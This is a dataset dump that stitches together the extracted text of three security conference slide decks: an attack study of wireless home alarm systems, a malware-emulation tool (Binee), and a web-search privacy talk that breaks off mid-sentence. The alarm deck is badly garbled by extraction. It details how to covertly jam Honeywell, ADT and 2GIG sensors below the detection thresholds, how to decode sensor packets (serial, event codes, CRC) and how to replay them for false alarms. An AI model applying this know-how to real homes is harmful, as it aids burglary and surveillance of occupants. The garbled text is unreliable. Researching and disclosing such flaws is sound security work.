text
stringlengths
100
9.93M
category
stringclasses
11 values
Home%Insecurity:%No%alarm,%False% alarms,%and%SIGINT% Logan&Lamb& lamblm@ornl.gov& & Agenda% •  Mo/va/on& •  Models&and&Methodology& •  A7ack&Primi/ve&Implementa/on& •  Applica/on&to&three&security&systems& •  Observa/ons& •  Conclusion& Who%am%I?% •  Researcher&for&Center&for&Trustworthy& Embedded&Systems&at&ORNL& •  Focus&on&V2X&currently& •  Ongoing&privacy&research&involving& intelligent&transporta/on&systems& Home%Security%System%Value% •  Ostensibly&protects&your&home&and& occupants&from&intruders!& – Previous&hacks& •  Disable&Sensors& •  Control&GSM& •  ZPWave&(Home&Automa/on)& •  Lower&insurance&premiums!& & Mo@va@on% •  Complete&dominance&of&the&security& system& – Render&it&useless& – If&possible,&make&owning&a&security&system&a& liability& Mo@va@on% •  Covert&Infiltra/on&and&Exfiltra/on& •  Monitor&Behavior& •  Induce&Behavior& Mo@va@on% •  Covert&Infiltra/on&and&Exfiltra/on& – Monitoring&Company& – Occupants& •  Monitor&Behavior& •  Induce&Behavior& & Mo@va@on% •  Covert&Infiltra/on&and&Exfiltra/on& •  Monitor&Behavior& – Par/cular&Occupants&(be7er&for&homes)& – Aggregate&(be7er&for&businesses)& •  Induce&Behavior& & Mo@va@on% •  Covert&Infiltra/on&and&Exfiltra/on& •  Monitor&Behavior& •  Induce&Behavior& – Monitoring&Company& – Occupants& & MODELS%AND%METHODOLOGY% Adversary%Model% Desires….& •  General&solu/on& •  High&Yield& •  Cheap& Adversary%Model% Desires….&A&WIRELESS&hack!& •  General&solu/on& •  High&Yield& •  Cheap& Adversary%Model% Desires….&A&WIRELESS&hack!& •  General&solu/on& – Bet&the&sub&GHz&RF&is&similar&across& manufacturers&and&super&vuln&!& •  High&Yield& •  Cheap& Adversary%Model% Desires….&A&WIRELESS&hack!& •  General&solu/on& • High&Yield&$$$& – Everything&is&going&wireless!& •  Cheap& S& Adversary%Model% Desires….&A&WIRELESS&hack!& •  General&solu/on& •  High& •  Cheap& •  SDRs&are&ge]ng&cheaper,&so^ware&is&‘cheap’& Adversary%Model% Desires….& •  Covert&Infiltra/on&and&Exfiltra/on& Accomplish&with&Replay% •  Monitor&Behavior& Accomplish&with&Replay% •  Induce&Behavior& Accomplish&with&Replay% Adversary%Model% Desires….& •  Covert&Infiltra/on&and&Exfiltra/on& – A7empt&with&Jamming% •  Monitor&Behavior& Accomplish&with&Replay% •  Induce&Behavior& Accomplish&with&Replay% Adversary%Model% Desires….& •  Covert&Infiltra/on&and&Exfiltra/on& – A7empt&with&Jamming% •  Monitor&Behavior& – A7empt&with&SIGINT% •  Induce&Behavior& Accomplish&with&Replay% Adversary%Model% Desires….& •  Covert&Infiltra/on&and&Exfiltra/on& – A7empt&with&Jamming% •  Monitor&Behavior& – A7empt&with&SIGINT% •  Induce&Behavior& – A7empt&with&Replay% Adversary%Model% Desires….& •  Covert&Infiltra/on&and&Exfiltra/on& – A7empt&with&Jamming% •  Monitor&Behavior& – A7empt&with&SIGINT% •  Induce&Behavior& – A7empt&with&Replay% Adversary%Model% •  Only&use&So^ware&Defined&Radio& – No&rom&dumping&(black&box&tes/ng)& •  Will&not&cra^&custom&messages& – No&protocol&fuzzing& – No&packets&of&death& Adversary%Model% •  Why&so&many&constraints?& – Easy&to&commodify&these&a7acks&if& successful& – Relax&the&restric/ons&if&the&adversary& needs&to&be&more&sophis/cated&!& Security%System%Model% •  Build&the&Model&based&on&the& Adversary’s&capabili/es& •  IntraPsystem&communica/ons&are&the& focus& Security%System%Model% Types&of&IntraPHome&Communica/ons& •  Vulnerable&& –  Legacy&sub&GHz&communica/ons& •  Secure& –  Everything&else& & Security%System%Model% Types&of&Devices&in&a&System& •  Sensors&& •  Alarm&Devices& – Alert&occupants&and/or&monitoring&company& •  Bridges& – Convert&one&communica/on&type&to&another& •  Other& Security%System%Model% Interes/ng&Proper/es& •  Sensors&trigger&their&events&even&when&the& system&is&disarmed& •  Sensors&have&one&way&communica/on& •  Only&alarm&devices&can&alert&the&stakeholders& Security%System%Model% •  Directed&Graph& –  Ver/ces&are&devices&(Sensors,&Alarm&Devices,&Bridges)& –  Edges&are&communica/on&channels&(Vulnerable&wireless,& everything&else)& –  Transmissions&flow&from&source&(sensors)&to&sinks&(alarm& devices)& Honeywell%Devices% Honeywell%Digraph% •  5&Sensors& – 2&Door& – 3&Mo/on& •  2&Alarm&Devices& – 1&Keypad& – 1&Control&Panel& Methodology% 1.  Iden/fy&all&devices&and&their&communica/on&type(s)& 2.  Generate&a&digraph&from&sources&to&sinks& 3.  If&there&are&any&wireless&communica/ons,&a7empt&the& SIGINT&a7ack&primi/ve& 4.  If&a&path&exists&from&source&to&sink&that&involves&a&wireless& communica/on&channel,&a7empt&the&Jamming&and&Replay& a7ack&primi/ves& 5.  Evaluate&the&a7ained&level&of&control&and&situa/on& awareness&& ATTACK%PRIMITIVE%IMPLEMENTATION% Prerequisites% •  So^ware&Defined&Radio,&USRP&N210& •  GNU&Radio& •  Tuned&Antenna& •  System&to&test&with& Prerequisites% •  So^ware&Defined&Radio,&USRP&N210& •  GNU&Radio& •  Tuned&Antenna& •  System&to&test&with& Prerequisites% •  So^ware&Defined&Radio,&USRP&N210& •  GNU&Radio& •  Tuned&Antenna& •  System&to&test&with& Prerequisites% •  So^ware&Defined&Radio,&USRP&N210& •  GNU&Radio& •  Tuned&Antenna& •  System&to&test&with& – Honeywell& Tuning%In% •  Spectrum&Analyzer& – Dedicated& – Build&with&SDR& – Consult&FCC&documenta/on& Jamming% •  Spot&Jamming& – Blast&noise!&:D& – It….works?&Really?& •  Manufacturers&are&aware&of&the&threat& – Introducing&‘RF&Jam’& – Once&enabled,&the&spot&jammer&fails& Periodic%Jamming% •  At&what&point&does&the&interference&go& from&benign&to&malicious?& – Noise&floor& – Number&of&malformed&transmissions& Noise%Floor%Tes@ng% •  How&long&can&the&spot&jammer&be&used?& – About&a&minute& •  Noise&floor&is&checked& Malformed%Packet%Tes@ng% •  In&GRC,&layout&flow&chart&that&flips&bits& – Induce&errors& – Low&duty&cycle& & How%quickly%can%we%turn%simple% jamming%off%and%on?% •  Pre7y&quick,&about&¼&of&a&second& •  Is&that&good?& – Yup& – Supervisory&transmission&requires&0.77&s& – Alarm&transmission&requires&3.54&s& What%does%this%get%us?% •  RF&Jam&Disabled& – Covert&infiltra/on&and&exfiltra/on& •  RF&Jam&Enabled& – Covert&infiltra/on,&exfiltra/on,&and&alarm& triggering& – When&enabled,&RF&Jam&is&a&liability& SIGINT% •  Tiers&of&complexity& – RF&Capture& – Bitstream& – Protocol&Capture& •  We&know&what&that&means& RF%Capture% •  Simple&in&GRC& – Useful&if&more&intel&is&available& Bitstream%Capture% Bitstream%T>%Packets% •  Helpful&if&more&intel&is&available& – From&the&FCC& • Manchester&encoded& • 3200&Baud& • Word&length&64&bits& • Packets&are&repeated&to&form&a&transmission& Bitstream%T>%Packets% •  Just&So^ware& – Read&bitstream&from&stdin& – Figure&out&the&number&of&samples&per&bit& – Convert&samples&to&bits& – Manchester&decode&and&print& Honeywell%Door%Packets% •  0xfffe%84d4%0280%512c% •  0xfffe%84d4%02a0%d1ef% •  0xfffe%84d4%02e0%506c% •  0xfffe%8faa%8380%4d3d% •  0xfffe%8faa%83a0%cdfe% •  0xfffe%8faa%83e0%4c7d% Reverse%Engineering% •  0xfffe%84d4%0280%512c% •  0xfffe%84d4%02a0%d1ef% •  0xfffe%84d4%02e0%506c% •  0xfffe%8faa%8380%4d3d% •  0xfffe%8faa%83a0%cdfe% •  0xfffe%8faa%83e0%4c7d% Device&Serial:& A&031P6418& Device&Serial:& A&102P6691& Reverse%Engineering% •  0xfffe% – In&every&packet& – Looks&like&a&preamble&and&sync&bit& Reverse%Engineering% •  0x{80,%a0,%e0}% – All&three&appear&for&both&sensors& – 0xa0%–&Open &Event&& – 0x80%–&Closed &Event&& – 0xe0%–&Tamper &Event& Reverse%Engineering% •  0x{84d402,%8faa83}% – Unique&to&each&sensor,&in&every&packet& – 0x84d402%No&significance,&but& – %0x4d402%316,418&in&decimal& – 316,418&P>&A&031P6418& – 0x8faa83&P>&A&102P6691& Reverse%Engineering% •  0x{512c,%d1ef,%506c,%4d3d,%cdfe,% 4c7d}% – What&is&this?&Different&for&each&packet&seen& – Probably&a&CRC,&/me&to&break&out…& – REVENG& CRC%Reversing%with%REVENG% •  ArbitraryPprecision&CRC&calculator&and& algorithm&finder& •  Search&every&packet&for&a&one&byte&or&two& byte&CRC& •  Easy&bash&script…& CRC%Reversing%with%REVENG% CRC%Reversing%with%REVENG% Reverse%Engineering% •  0xfffe%84d4%0280%512c% •  0xfffe% %–&Preamble&and&sync&bit& •  0x84d402% %–&Serial% •  0x80% % %–&Event&type% •  0x512c% %–&CRCP16/BUYPASS% What%does%this%get%us?% •  Monitoring&capability& – Helps&with&Situa/onal&Awareness& •  How?& – Different&sensors&transmit&different&events& – Sensors&are&installed&in&logical&loca/ons& Replay% •  What&does&this&get&us?& – Induce&behavior&with&false&alarms& & APPLICATION%TO%THREE%SYSTEMS% Honeywell% •  Covered&in&the&a7ack&primi/ve& implementa/on&sec/on& •  Summary& – Covert&Infiltra/on&and&Exfiltra/on&& – Induce&Behavior&& – Monitor&Behavior&& ADT%Devices% ADT%Digraph% •  8&Sensors& – 4&Door& – 3&Glass&Break& – 1&Mo/on& •  1&Alarm&Devices& – 1&Panel&(GSM&out)& ADT%Specifics% •  Completely&Wireless& •  RF&Jam&Detec/on&capable,&but&disabled& •  Unable&to&get&Installer&Code&& – Yeah,&there’s&a&fee&for&that& – Thanks&ADT& ADT%Changes% •  Simple&Jammer&and&Replay& – Center&Frequency&change&to&433.96& •  SIGINT& – Center&Frequency&change&to&433.96& – Reverse&Engineering&not&implemented,&but& all&info&is&given&in&FCC&Documenta/on…& ADT%Changes% Just&Needs&to&be&Implemented!& ADT% •  Summary& – Covert&Infiltra/on&and&Exfiltra/on&& – Induce&Behavior&& – Monitor&Behavior&& •  Not&currently&implemented& 2GIG%Devices% 2GIG%Digraph% •  6&Sensors& –  5&Door& –  1&Mo/on& •  2&Alarm&Devices& –  1&Go!Control&Panel& –  1&12V&Control&Panel& •  1&Bridge&Device& –  2GIG&Takeover&Module& 2GIG%Digraph% 2GIG%Equivalent%Digraph% 2GIG%Specifics% •  Hybrid&System& – Wired&and&wireless&devices& – RF&Jam&Detec/on&capable,&but&disabled& • Sooo,&we&enabled&it&!& 2GIG% •  Summary& – Covert&Infiltra/on&and&Exfiltra/on&& – Induce&Behavior&& – Monitor&Behavior&& Observa@ons% – Full&control&and&monitoring&on&all& systems& – Simple&communica/ons& – Legacy&communica/ons& Thanks!% Logan&Lamb& lamblm@ornl.gov& &
pdf
Next Generation Process Emulation with Binee Kyle Gwinnup @switchp0rt John Holowczak @skipwich Carbon Black TAU The Problem: getting information from binaries Each sample contains some total set of information. Our goal is to extract as much of it as possible Time/Cost to analyze Sample coverage Static Dynamic High coverage Immediate discovery Few features Low coverage Long discovery Many features Core Problems 1. Obfuscation hides much of the info 2. Anti-analysis is difficult to keep up with 3. Not all Malware is equal opportunity Our Goal: Reduce cost of information extraction 1. Reduce the cost of features extracted via dynamic analysis 2. Increase total number of features extracted via static analysis 3. Ideally, do both of these at scale Time/Cost to analyze Sample Coverage Dynamic Static + Emulation High coverage Immediate discovery Many features Low coverage Long discovery Many features The How: Emulation Extend current emulators by mocking functions, system calls and OS subsystems Existing PE Emulators ● PyAna https://github.com/PyAna/PyAna ● Dutas https://github.com/dungtv543/Dutas ● Unicorn_pe https://github.com/hzqst/unicorn_pe ● Long list of other types of emulators https://www.unicorn-engine.org/showcase/ Requirements: What are we adding/extending from current work? 1. Mechanism for loading up a PE file with its dependencies 2. Framework for defining function and API hooks 3. Mock OS subsystems such as a. Memory management b. Registry c. File system d. Userland process structures 4. Mock OS environment configuration file a. Config file specifies language, keyboard, registry keys, etc… b. Rapid transition from one Mock OS configuration to another Binee Where to start? Parse the PE and DLLs, then map them into emulation memory... Build hook table by linking DLLs outside emulator Target PE DLL1 DLL2 DLL3 Emulated Process Memory Binee Address to Hook table 1. Open PE and all dependencies 2. Update DLL base addresses 3. Update relocations 4. Build Binee exports lookup table 5. Resolve Import Address Tables for each 6. Map PE and DLLs into memory Overcoming Microsoft’s ApiSet abstraction layer Parse ApiSetSchema.dll (multiple versions) and load proper real dll. Geoff Chappell https://www.geoffchappell.com/studies/windows/win32/apisetschema/index.htm api-ms-<something>.dll ApiSet Schema Table kernelbase.dll kernel32:CreateFileA What is the minimum that the malware needs in order to continue proper execution? Requirements for hooking 1. A mapping of real address to Binee’s Hook for that specific function? 2. The calling convention used? 3. How many parameters are passed to the function? 4. Need to determine the return value if any? type Hook struct { Name string Parameters []string Fn func(*WinEmulator, *Instruction) bool Return uint64 ... } emu.AddHook("", "Sleep", &Hook{ Parameters: []string{"dwMilliseconds"}, Fn: func(emu *WinEmulator, in *Instruction) bool { emu.Ticks += in.Args[0] return SkipFunctionStdCall(false, 0x0)(emu, in) }, }) Partial Hook, where the function itself is emulated within the DLL emu.AddHook("", "GetCurrentThreadId", &Hook{Parameters: []string{}}) emu.AddHook("", "GetCurrentProcess", &Hook{Parameters: []string{}}) emu.AddHook("", "GetCurrentProcessId", &Hook{Parameters: []string{}}) Two types of hooks in Binee Full Hook, where we define the implementation Hook Parameters field defines how many parameters will be retrieved from emulator and The name/value pair in output [1] 0x21bc0780: P memset(dest = 0xb7feff1c, char = 0x0, count = 0x58) emu.AddHook("", "memset", &Hook{Parameters: []string{"dest", "char", "count"}}) Output is the following Example: Entry point execution ./binee -v tests/ConsoleApplication1_x86.exe [1] 0x0040142d: call 0x3f4 [1] 0x00401821: mov ecx, dword ptr [0x403000] [1] 0x0040183b: call 0xffffff97 [1] 0x004017d2: push ebp [1] 0x004017d3: mov ebp, esp [1] 0x004017d5: sub esp, 0x14 [1] 0x004017d8: and dword ptr [ebp - 0xc], 0 [1] 0x004017dc: lea eax, [ebp - 0xc] [1] 0x004017df: and dword ptr [ebp - 8], 0 [1] 0x004017e3: push eax [1] 0x004017e4: call dword ptr [0x402014] [1] 0x219690b0: F GetSystemTimeAsFileTime(lpSystemTimeAsFileTime = 0xb7feffe0) = 0xb7feffe0 [1] 0x004017ea: mov eax, dword ptr [ebp - 8] [1] 0x004017ed: xor eax, dword ptr [ebp - 0xc] [1] 0x004017f0: mov dword ptr [ebp - 4], eax [1] 0x004017f3: call dword ptr [0x402018] At this point, we have a simple loader that will handle all mappings of imports to their proper DLL. We’re basically done, right? Still have some functions that require user land memory objects that do not transition to kernel via system calls We need segment registers to point to the correct memory locations (thanks @ceagle) Not inside of main yet… Userland structures, TIB/PEB/kshareduser We need a TIB and PEB with some reasonable values Generally, these are configurable. Many just need some NOP like value, e.g. NOP function pointer for approximate malware emulation. All address resolution and mappings are built outside of the emulator type ThreadInformationBlock32 struct { CurentSEH uint32 //0x00 StackBaseHigh uint32 //0x04 StackLimit uint32 //0x08 SubSystemTib uint32 //0x0c FiberData uint32 //0x10 ArbitraryDataSlock uint32 //0x14 LinearAddressOfTEB uint32 //0x18 EnvPtr uint32 //0x1c ProcessId uint32 //0x20 CurrentThreadId uint32 //0x24 … } PEs are parsed and loaded. Basic structures like the segment registers and TIB/PEB are mapped with minimum functionality. We’re defining the entire environment outside of the emulator... Almost Everything in Windows needs HANDLEs type Handle struct { Path string Access int32 File *os.File Info os.FileInfo RegKey *RegKey Thread *Thread } type WinEmulator struct { ... Handles map[uint64]*Handle ... } What is the minimum we need for a HANDLE in Binee? 1. An abstraction over subsystem data types 2. Helper methods for reading/writing/etc... to and from subsystems. HANDLEs get allocated directly from the Heap The Heap plays a central role in Binee The Heap is what enables and ultimately distributes HANDLEs for all other emulation layers, including file IO and the registry. kernel32:* ntdll:* Binee MM Basically, anything not in the stack after execution has started goes into Binee’s Heap Manager. Now we have a decent core, at least with respect to the user land process. Now it is time to build out the Mock OS subsystems Starting with the Mock File System What are the requirements for CreateFileA? Returns a valid HANDLE into EAX register Creating Files in the Mock File Subsystem CreateFile Emulator Full Hook Handler HANDLE Lookup Table Full hook captures HANDLE from parameters to CreateFile If file exists in Mock File System or permissions are for “write”. Create a new Handle object and get unique ID from Heap Manager Write HANDLE back to EAX Writing Files in the Mock File Subsystem WriteFile Emulator Full Hook Handler HANDLE Lookup Table Temp Real File System (Sandboxed) Full hook captures HANDLE from parameters to WriteFile HANDLE is used as key to lookup actual Handle object outside of emulator All writes are written to sandboxed file system for later analysis. Malware thinks file was written to proper location and continues as if everything is successful [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'ERROR_SUCCESS = 0x%x\n', p0 = 0x0) = 0x403380 [1] 0x21970b80: F CreateFileA(lpFileName = 'malfile.exe', dwDesiredAccess = 0xc0000000, dwShareMode = 0x0, lpSecurityAttributes = 0x0, dwCreationDisposition = 0x2, dwFlagsAndAttributes = 0x80, hTemplateFile = 0x0) = 0xa00007b6 [1] 0x219c8fbe: F VerSetConditionMask() = 0xa00007b6 [1] 0x20af60a0: P __acrt_iob_func() = 0xa00007b6 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'out = 0x%x\n', p0 = 0xa00007b6) = 0x403380 [1] 0x219c8fbe: F VerSetConditionMask() = 0x403380 [1] 0x20af60a0: P __acrt_iob_func() = 0x403380 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'out = 0x%x\n', p0 = 0x403380) = 0x403380 [1] 0x219c8fbe: F VerSetConditionMask() = 0x403380 [1] 0x20af60a0: P __acrt_iob_func() = 0x403380 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'out = 0x%x\n', p0 = 0x403380) = 0x403380 [1] 0x218f5780: P memset(dest = 0xb7feff1c, char = 0x0, count = 0x58) = 0xb7feff1c [1] 0x21971000: F WriteFile(hFile = 0xa00007b6, lpBuffer = 0xb7feff10, nNumberOfBytesToWrite = 0xb, lpNumberOfBytesWritten = 0xb7feff0c, lpOverlapped = 0x0) = 0xb [1] 0x21969500: F IsProcessorFeaturePresent(ProcessorFeature = 0x17) = 0x1 [1] 0x2196cef0: F SetUnhandledExceptionFilter(lpTopLevelExceptionFilter = 0x0) = 0x4 And in the console > ls temp malfile.exe > cat temp/malfile.exe hello world Now you can see the file contents. Obviously trivial… more to come…. At this point, the user space is largely mocked. We also have the ability to hook functions, dump parameters and modify the call execution. Additionally, we have some mock HANDLEs. Can we emulate more?! Mock Registry Subsystem RegOpenKeyA Mock Registry Emulator Full Hook on Registry functions Our hook interacts with the Mock Registry subsystem that lives outside of the emulation Mock Registry has helper functions to automatically convert data to proper types and copy raw bytes back into emulation memory Configuration files defines OS environment quickly ● Yaml definitions to describe as much of the OS context as possible ○ Usernames, machine name, time, CodePage, OS version, etc… ● All data gets loaded into the emulated userland memory root: "os/win10_32/" code_page_identifier: 0x4e4 registry: HKEY_CURRENT_USER\Software\AutoIt v3\AutoIt\Include: "yep" HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Arbiters\InaccessibleRange\Psi: "PhysicalAddress" HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Arbiters\InaccessibleRange\Root: "PhysicalAddress" HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Arbiters\InaccessibleRange\PhysicalAddress: "hex(a):48,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,0 0,00,00,01,00,00,00,00,03,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,01,00,ff,ff,ff,ff,ff,f f,ff,ff" [1] 0x2230c420: F RegOpenKeyExA(hKey = 'HKEY_LOCAL_MACHINE', lpSubKey = 'SYSTEM\ControlSet001\Control\Windows', ulOptions = 0x0, samDesired = 0x20019, phkResult = 0xb7feff40) = 0x0 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'successfully opened key %s\n', p0 = 'SYSTEM\ControlSet001\Control\Windows') = 0x403378 [1] 0x2230c3e0: F RegQueryValueExA(key = 0xa000099c, lpValueName = 'ComponentizedBuild', lpReserved = 0x0, lpType = 0xb7feff44, lpData = 0xb7feff4c, lpcbData = 0xb7feff48) = 0x0 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'status code = 0x%x\n', p0 = 0x0) = 0x403378 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'ComponentizedBuild = %d\n', p0 = 0x1) = 0x403378 [1] 0x2230c3e0: F RegQueryValueExA(key = 0xa000099c, lpValueName = 'CSDBuildNumber', lpReserved = 0x0, lpType = 0xb7feff44, lpData = 0xb7feff4c, lpcbData = 0xb7feff48) = 0x0 [1] 0x20af60a0: P __acrt_iob_func() = 0x0 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'CSDBuildNumber = %d\n', p0 = 0x194) = 0x403378 [1] 0x2230c1d0: F RegCloseKey(key = 0xa000099c) = 0x0 [1] 0x22336bd0: F RegCreateKeyA(hKey = 'HKEY_CURRENT_USER', lpSubKey = 'Software\Binee', phkResult = 0xb7feff40) = 0x0 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'successfully opened key %s\n', p0 = 'Software\Binee') = 0x403378 [1] 0x22337640: F RegSetValueA(hKey = '', lpSubKey = 'Testing', dwType = 0x1, lpDate = 0xb7feff80, cbData = 0x0) = 0x57 Configuration files can be used to make subtle modifications to the mock environment which allows you to rapidly test malware in diverse environments Let’s do more... Mocked Threading Round robin scheduler approximately simulates a multi-thread environment. Time slices are configurable but equal for each “thread” of execution. Thread manager handles all the context switching and saving of registers. Allows us to hand wave (punt for later) most multithreading issues. Thread 1 Thread 2 Thread 3 Thread 4 Thread Manager Threads inside the emulator [1] 0x20ae3f80: F CreateThread(lpThreadAttributes = 0x0, dwStackSize = 0x0, lpStartAddress = 0x401040, lpParameter = 0xa01007ee, dwCreationFlags = 0x0, lpThreadId = 0x0) = 0x3 [1] 0x20ae06d0: F GetProcessHeap() = 0x123456 [2] 0x20dd0710: F __stdio_common_vfprintf(stream = 0x0, format = 'tid %d, count %d\n', p0 = 0x0, p1 = 0x0) = 0x403378 [3] 0x20dc10a0: P __acrt_iob_func() = 0xa01007ee [1] 0x20b3f05a: F HeapAlloc(hHeap = 0x123456, dwFlags = 0x8, dwBytes = 0x4) = 0xa0200826 [1] 0x20ae3f80: F CreateThread(lpThreadAttributes = 0x0, dwStackSize = 0x0, lpStartAddress = 0x401040, lpParameter = 0xa0200826, dwCreationFlags = 0x0, lpThreadId = 0x0) = 0x4 [2] 0x20dc10a0: P __acrt_iob_func() = 0x403378 [3] 0x20dd0710: F __stdio_common_vfprintf(stream = 0x0, format = 'tid %d, count %d\n', p0 = 0x1, p1 = 0x0) = 0x403378 [1] 0x20aeaaf0: **WaitForMultipleObjects**() = 0xb7feffa4 [1] 0x2011e5a0: **WaitForMultipleObjects**() = 0xb7feffa4 [2] 0x20dc10a0: P __acrt_iob_func() = 0x403378 [4] 0x20dc10a0: P __acrt_iob_func() = 0xa0200826 [1] 0x2011e5d0: **WaitForMultipleObjectsEx**() = 0xb7feffa4 [3] 0x20dc10a0: P __acrt_iob_func() = 0x403378 [2] 0x20dd0710: F __stdio_common_vfprintf(stream = 0x0, format = 'tid %d, count %d\n', p0 = 0x0, p1 = 0x1) = 0x403378 Increasing fidelity with proper DllMain execution Need to setup stack for DllMain call, set up proper values for DLLs loaded by the PE. Call this for every DLL loaded by the PE. But how to do this in the emulator? Start emulation at each DllMain and stop at ??? BOOL WINAPI DllMain( _In_ HINSTANCE hinstDLL, _In_ DWORD fdwReason, _In_ LPVOID lpvReserved ); ROP Gadgets — an easy shortcut to loading DLLs A simpler approach is to only start the emulator once when the entire process space is layed out. However, the start point is no longer the PE entry point. Instead, entry point is now the start of our ROP chain that calls each loaded DllMain in order and ending with the PE’s entry point address lpvReserved fdwReason hinstDll ret lpvReserved fdwReason hinstDll ret lpvReserved fdwReason hinstDll ret envp argv argc dll_1 dll_2 dll_3 malware Demos ● ea6<sha256> shows unpacking and service starting ● ecc<sha256> shows unpacking and wrote malicious dll to disk, loaded dll and executed it We’ve open-sourced this — What’s next ● Increase fidelity with high quality hooks ● Single step mode, debugger style ● Networking stack and implementation, including hooks ● Add ELF (*nix) and Mach-O (macOS) support ● Anti-Emulation Thank you and come hack with us https://github.com/carbonblack/binee
pdf
The Hacker Pimps The Hexagon Security Group Creating Unreliable Systems “Attacking the Systems that Attack You” Sysmin Sys73m47ic & Marklar From: The Hacker Pimps The Hacker Pimps The Hexagon Security Group Document Versioning ● For a copy of this presentation visit: ● www.hackerpimps.com/docs.html The Hacker Pimps The Hexagon Security Group Warning!!! ● Some of the techniques discussed in this presentation can be hazardous to your personal freedoms. – Mainly the staying out of jail part ● Everything discussed in this presentation is strictly theoretical ;) The Hacker Pimps The Hexagon Security Group Why? ● Why do we want to create unreliable systems? Isn't that the opposite of what we are supposed to do? ● Don't people get paid to make systems reliable? ● Unreliable systems can not be counted on. The Hacker Pimps The Hexagon Security Group Technology Changes Everything ● We do not have new problems, we have new technology. ● We seem to love having our freedoms taken away, just because things are cool or convenient. ● Companies and the Government are finding newer more sneaky ways to get your information. The Hacker Pimps The Hexagon Security Group A Presumptive Right To Privacy? Why not presume the right/need for privacy? The number one excuse: “I've got nothing to hide!” This is the comfortable position of those who are not marginalized. The Hacker Pimps The Hexagon Security Group Are you: In great pain and unable to legally manage pain? Gay and in the military? Needing to express unpopular views that would otherwise risk your safety? A whistle blower? A security researcher? The Hacker Pimps The Hexagon Security Group Privacy “I don't care that X is watching me. I'm not doing anything wrong!” Who might X be? The Hacker Pimps The Hexagon Security Group The Executive Branch The Hacker Pimps The Hexagon Security Group The Other Executive Branch The Hacker Pimps The Hexagon Security Group The Imaginary Judicial Branch The Hacker Pimps The Hexagon Security Group The Other Imaginary Judicial Branch The Hacker Pimps The Hexagon Security Group The No Such Branch Branch The Branch Which Must-Not-Be-Named The Hacker Pimps The Hexagon Security Group Your Bad Neighbor The Hacker Pimps The Hexagon Security Group Your Nosy Neighbor The Hacker Pimps The Hexagon Security Group Your Good Neighbor The Hacker Pimps The Hexagon Security Group Picking A Target What Information Gathering System provides the most comprehensive aggregate of what you are thinking about? Perhaps Web Search? The Hacker Pimps The Hexagon Security Group Target Information Gathering System The Hacker Pimps The Hexagon Security Group Web Search Privacy Information: IP Address Cookies Sessions Browser addons / components Flash/Java/JavaScript, etc: The Interactive Web! The Hacker Pimps The Hexagon Security Group Dilemma The things that make the web useful are often potentially invasive The Hacker Pimps The Hexagon Security Group Proposed Architecture for Web Search Privacy 1. Existing: Tor + TorButton Summary: Hide your IP Address The Hacker Pimps The Hexagon Security Group Proposed Architecture for Web Search Privacy 2. Proposed “Quiet” button ● Turn off automatic search completion (automatic with Tor) ● Block access to cookies: use/keep cookies, but make them inaccesable on demand. ●Alternatively, the imilly.com google cookie anonymizer (but what about other search engines) The Hacker Pimps The Hexagon Security Group Proposed Architecture for Web Search Privacy 3. Proposed Plugin: P2P Web Search Identity Diffusion On demand, hide in a crowd A Nifty, Helpful, Insufficient Idea The Hacker Pimps The Hexagon Security Group P2P Identity Diffusion When you do a web search, a. N ?= 30 instances of the query terms are put on P2P b. the plugin downloads N queries from P2P c. a and b are executed through Tor,hiding your IP address. d. The N searches are executed in the background e. the original search is executed after (rand() % N) P2P queries are executed f. User-Agent is modified to indicate P2P Search Summary: The origin of an individual query will still diffuse among N browsers The Hacker Pimps The Hexagon Security Group Why Insufficient? Aggregates and Standing out from the crowd. Changing Models The Hacker Pimps The Hexagon Security Group Where do you stand in the aggregate picture? Google Analytics is interesting Sometimes it's not what you'd think The Hacker Pimps The Hexagon Security Group Google Analytics: Sheep Sex The Hacker Pimps The Hexagon Security Group Google Analytics: Goatse The Hacker Pimps The Hexagon Security Group Google Analytics: Stocks The Hacker Pimps The Hexagon Security Group Google Analytics: Stock The Hacker Pimps The Hexagon Security Group Please Note: I AM NOT A TERRORIST The Hacker Pimps The Hexagon Security Group Google Analytics: terrorists The Hacker Pimps The Hexagon Security Group Google Analytics: terrorism The Hacker Pimps The Hexagon Security Group Google Analytics: Terror,Terrorists, and Terrorism The Hacker Pimps The Hexagon Security Group Google Analytics: Terror,Terrorists, and Terrorism WTF? The Hacker Pimps The Hexagon Security Group The Point 1. Wake Up! It's not like they say on the news 2. (The “real” point): Diffusing a query source is insufficient until N is sufficiently large to smooth your graph down into the aggregate picture The Hacker Pimps The Hexagon Security Group Privacy and Changing models Keywords: Privacy Bill of Rights Strict Constructionists The Eighth Amendment The Hacker Pimps The Hexagon Security Group Google and Changing Models The Hacker Pimps The Hexagon Security Group A Change of Focus ● We spend a lot of time worrying about people knowing who we are or where we connect from. ● There is a larger problem of people knowing what we are. – This is the ultimate goal of collection technologies. The Hacker Pimps The Hexagon Security Group Who You Are ● Who you are is your identity and all of the associated items that identify you: – Name – Address – SSN – Phone Number – Etc. The Hacker Pimps The Hexagon Security Group What You Are ● Male / Female. ● Race, Non-Religious / Religious, Straight / Gay. ● Diabetic, Asmatic, other medical conditions. ● Mental issues. ● Veteran. ● Porn addict. ● Compulsive masturbator. The Hacker Pimps The Hexagon Security Group Who and What ● Put both the Who and the What together and it starts to get real scary. The Hacker Pimps The Hexagon Security Group Collected Data ● Collected data is dangerous. – It can be sold. – It can be misused. (Government creating files on all of us). – Incorrect assumptions can be made on this collected data. – May be impossible to correct inaccuracies. ● Data is collected from: – Aggregates – Inference The Hacker Pimps The Hexagon Security Group Aggregated Data ● Data collected from multiple sources in order in to obtain a more complete picture. ● Example: Collecting data from multiple sources to get an idea of your shopping habits: – 